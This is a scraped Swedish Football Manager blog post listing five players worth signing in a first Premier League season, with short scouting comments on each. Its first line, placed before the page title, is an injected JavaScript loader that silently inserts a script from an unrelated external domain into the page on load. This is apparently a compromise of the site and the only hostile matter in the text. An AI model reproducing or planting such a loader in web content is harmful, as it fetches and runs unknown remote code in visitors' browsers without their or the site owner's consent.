;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Start of the week – Spelarna att värva till PL – FMSweden
Meny Stäng

Start of the week – Spelarna att värva till PL

5 bästa spelarna att värva första säsongen i PL 

 

  1. Anel Ahmedhodzic 21 år gammal MB Malmö FF 

En spelare som är villig att gå till samtliga PL klubbar från start och du får han för 40–80 miljoner. Världsklass inom 2–3 säsonger om han får speltid och tillräckligt bra från första säsongen att starta i dem absolut flesta lagen. Extremt billig för vad du får. Världsklass!

 

  1. Andrea Papetti 18 år gammal MB Brescia 

Italiensk supertalang. Mittback precis som Ahmedhodzic och även om han är väldigt ung är han tillräckligt bra för att starta redan första säsongen. Växer med uppgiften och ger du han rikligt med speltid har du en av världens bästa mittbackar inom 3–4 säsonger. Går till Arsenal i dem flesta games jag startar så var med från start och hugg!

 

  1. Emi Buendia 24 år gammal OM Norwich

Ett dyrare alternativ och för dem som gillar att ratta de stora klubbarna i England så är Emi Buendia ett fantastiskt alternativ. Tekniska argentinaren är alldeles för bra för Norwich och Championship. Inte purung men är långt ifrån sin bästa nivå ännu. Hög förmåga med en ännu högre potential.

 

  1. Marcus Edwards 22 år gammal OM Vit. Guimaraes

Den förre Tottenhamtalangen som numer spelar i den portugisiska ligan är extremt teknisk och en spelartyp jag personligen gillar att värva till mina lag i FM. Snabb och teknisk med stor finess. Har en utköpsklausul på 520 mn kronor som såklart är svår att lösa ifall man är ett av dem mindre lagen. I alla fall den första säsongen men Edwards är värd ta in även om du är ett av dem större lagen.

 

  1. Isak Bergmann Johannesson 17 år gammal CM/VM IFK Norrköping

Isländsk supertalang som vi som följer Allsvenskan känner till väl. Att han håller till i Allsvenskan gör ju också affären billigare än normalt. IBJ kanske inte går in från start i PL första säsongen men knyt dig till han direkt och ge han speltid från bänken eller låna ut. IBJ är 17 år gammal så det finns många säsonger att utveckla honom till den stjärna han har potential till att bli.

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar